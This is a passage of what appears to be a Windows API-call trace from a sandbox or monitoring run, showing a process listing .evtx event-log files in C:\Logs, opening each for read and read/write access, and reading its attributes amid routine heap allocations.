[0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.605] AreFileApisANSI () returned 1 [0072.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", lpUsedDefaultChar=0x0) returned 51 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.605] AreFileApisANSI () returned 1 [0072.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46128 [0072.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46128, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 51 [0072.606] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.606] GetFileType (hFile=0x418) returned 0x1 [0072.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0072.606] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.606] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.606] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.606] CloseHandle (hObject=0x418) returned 1 [0072.607] AreFileApisANSI () returned 1 [0072.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0072.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 51 [0072.607] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.607] GetFileType (hFile=0x418) returned 0x1 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0072.607] CloseHandle (hObject=0x418) returned 1 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.608] AreFileApisANSI () returned 1 [0072.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46208 [0072.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 51 [0072.608] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.608] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0072.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.609] AreFileApisANSI () returned 1 [0072.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", lpUsedDefaultChar=0x0) returned 50 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.609] AreFileApisANSI () returned 1 [0072.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0072.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46978 [0072.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 50 [0072.609] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.610] GetFileType (hFile=0x418) returned 0x1 [0072.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0072.610] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.610] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.611] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.611] CloseHandle (hObject=0x418) returned 1 [0072.611] AreFileApisANSI () returned 1 [0072.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0072.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46358 [0072.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 50 [0072.611] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.611] GetFileType (hFile=0x418) returned 0x1 [0072.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.611] CloseHandle (hObject=0x418) returned 1 [0072.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.612] AreFileApisANSI () returned 1 [0072.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x469e8 [0072.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 50 [0072.612] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.612] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.612] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.612] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0072.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.614] AreFileApisANSI () returned 1 [0072.614] WideCharToMultiByte (in: 